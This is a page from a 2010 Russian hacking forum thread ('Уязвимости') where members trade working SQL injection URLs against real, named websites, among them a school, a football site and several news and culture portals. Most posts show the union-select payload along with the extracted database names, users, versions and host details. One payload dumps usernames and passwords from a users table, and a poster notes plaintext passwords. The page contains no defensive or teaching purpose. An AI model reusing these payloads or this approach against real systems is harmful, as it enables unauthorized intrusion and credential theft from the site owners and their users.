ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11541  
Старый 24.02.2010, 21:25
Аватар для Kverter
Kverter
Новичок
Регистрация: 08.10.2009
Сообщений: 7
Провел на форуме:
24928

Репутация: 2
По умолчанию

http://www.gimnazia70.spb.ru/index.php?id_page=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase()),2,3&db=yes

5.0.77-log:
gimnazia_school@jupiter.usedns.com:
gimnazia_school
 
Ответить с цитированием

  #11542  
Старый 24.02.2010, 21:42
Аватар для Kverter
Kverter
Новичок
Регистрация: 08.10.2009
Сообщений: 7
Провел на форуме:
24928

Репутация: 2
По умолчанию

немного футбола))))
http://www.eurocups.ru/champs/table.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase()),2,3
 
Ответить с цитированием

  #11543  
Старый 25.02.2010, 05:13
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

гы версия 4.1.22-standard-log 5
таблица users 57 колонок, пипец
Цитата:
http://www.eaea.org/index.php?k=4821&%20projekti_id=3378+AND%20(1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57)%20=%20(SELECT%20*%20FROM%20users%20UNION%20 SELECT%201,2,3%0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57%20LIMIT%201)/*
Цитата:
http://www.eaea.org/index.php?k=4821&%20projekti_id=3378+union+select+ 1,2,3,4,5,group_concat(concat_ws(0x3a,version(),us er,password)),7,8,9,10,11,12,13,14,15,16+from+user s/*

Последний раз редактировалось Strilo4ka; 25.02.2010 в 11:17.. Причина: отступы!!!
 
Ответить с цитированием

  #11544  
Старый 25.02.2010, 18:05
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://pinskdrevmebel.ru/novosti/item/otkrytie_novogo_sajta'+and+1=2)+UNION+SELECT+1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7,8,9,10,11,12,13+--+
pinskdre_loran: pinskdre@localhost: 5.0.87-community-log

Все пароли снова в открытом виде(
 
Ответить с цитированием

  #11545  
Старый 25.02.2010, 21:28
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.oferta.ro/anunturi/Imobiliare/Inchirieri-apartamente-4_-camere/Sibiu/Apartament-in-Piata-Mica&siteid=937135+UNION+SELECT+concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),2+L IMIT+1,1--



Database Version: 4.1.22-standard
Database name: oferta_oferta
User name: oferta_oferta@localhost
Os : unknown-linux-gnu
 
Ответить с цитированием

  #11546  
Старый 26.02.2010, 00:22
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://tobaccoreporter.com/home.php?id=498&art=-1+union+select+1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6,7,8,9,10+--+
trmag_db:trmag_user@localhost:4.1.20
 
Ответить с цитированием

  #11547  
Старый 26.02.2010, 00:40
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
http://www.usps.org.ua/index.php?mid=22&action=news_full&news_id=-184+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,users.*+from+users--+
чесно скажу впадло в схему лезть хоть и доступ есть
 
Ответить с цитированием

  #11548  
Старый 26.02.2010, 01:12
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Можно меня поздравить! сотый пост) спс ачату) много чему научился!)

перешёл на мазиллу)


есть phpbb форум(насколько с базы понял)
Код:
http://mashiki.dominga.ru/view.php?id=-1+union+select+1,group_concat(database(),0x3a,user(),0x3a,version())+--+&sec=2
dominga:dominga@localhost:5.0.51a-24+lenny1

Код:
http://lyrikline.org/index.php?id=162&L=1&show=Poems&author='+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11,12,13,14,15,16++--+&cHash=834d11c441
lyrikli_update: 5.0.77-log: lyrikli_typo3@static.215.19.46.78.clients.your-server.de

Databases: lyrikli_typo3,lyrikli_update

Последний раз редактировалось Seravin; 26.02.2010 в 03:27..
 
Ответить с цитированием

  #11549  
Старый 26.02.2010, 13:32
Аватар для Byte_
Byte_
Участник форума
Регистрация: 07.09.2008
Сообщений: 139
Провел на форуме:
351188

Репутация: 65
По умолчанию

http://www.dk-spb.ru/homebook.php?part=contact&idsub=77+UNION+SELECT+CO NCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%2 8%29,version%28%29%29--
В тайтл выводится.
dbu_domknigi_1@192.168.5.56 : db_domknigi_1 : 5.0.77-log
 
Ответить с цитированием

  #11550  
Старый 26.02.2010, 15:20
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ounix.ru/index.php?page=article&id=8%20UNION%20SELECT%201,2 ,3,concat_ws(0x3a,version(),database(),user(),@@ve rsion_compile_os),5,6%20LIMIT%201,1


Database Version: 4.0.27
Database name: ounix
User name: DarkAdmin@localhost
OS : portbld-freebsd6.2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ